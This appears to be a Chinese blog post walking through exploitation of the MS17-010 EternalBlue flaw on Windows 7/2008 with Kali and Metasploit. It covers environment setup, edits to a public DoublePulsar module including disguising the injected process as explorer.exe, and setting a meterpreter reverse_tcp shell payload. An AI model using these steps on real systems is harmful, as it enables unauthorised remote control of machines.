前言
MS17-010是什么想必大家都不陌生了,前段時間Shadow Broker披露的 Windows漏洞,影響Windows 7和Windows Server 2008大部分版本系統(tǒng)。最近一直沒啥時間試試,今天晚上終于找到了合適的時間。
參考了兩篇文章
1.http://www.freebuf.com/articles/system/132274.html
2.http://www.freebuf.com/articles/system/132813.html
這兩篇文章的方法都需要Python2.6? 和 pywin32環(huán)境,感覺有些麻煩...這里使用kali來進(jìn)行MS17-010的利用
1.下載EXP
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2.配置環(huán)境
64位:
dpkg --add-architecture i386
apt-get update
apt-get install lib32z1 lib32ncurses5
apt-get install wine32
wine cmd.exe
32位:
wine cmd.exe
(吐槽一下,感覺64位配置環(huán)境的時間都夠下個32位安上了)
3.修改下載的eternalblue_doublepulsar.rb
1.改路徑
將/root/Eternalblue-Doublepulsar-Metasploit/deps/改為/usr/share/metasploit-framework/modules/exploits/windows/smb/deps
2.改進(jìn)程名稱
默認(rèn)進(jìn)程名稱為wlms.exe,建議修改為explorer.exe
3.將文件名稱改為方便的名稱(我改為了ms17-010.rb)
4.將文件復(fù)制到kali的/usr/share/metasploit-framework/modules/exploits/windows/smb/
4.開始利用exp
1.打開msf
2.加載exp
use exploit/windows/smb/ms17-010
3.建立payload
set payload windows/x64/meterpreter/reverse_tcp
4.配置參數(shù)
這里就不詳細(xì)說了,不會的百度
5.執(zhí)行
成功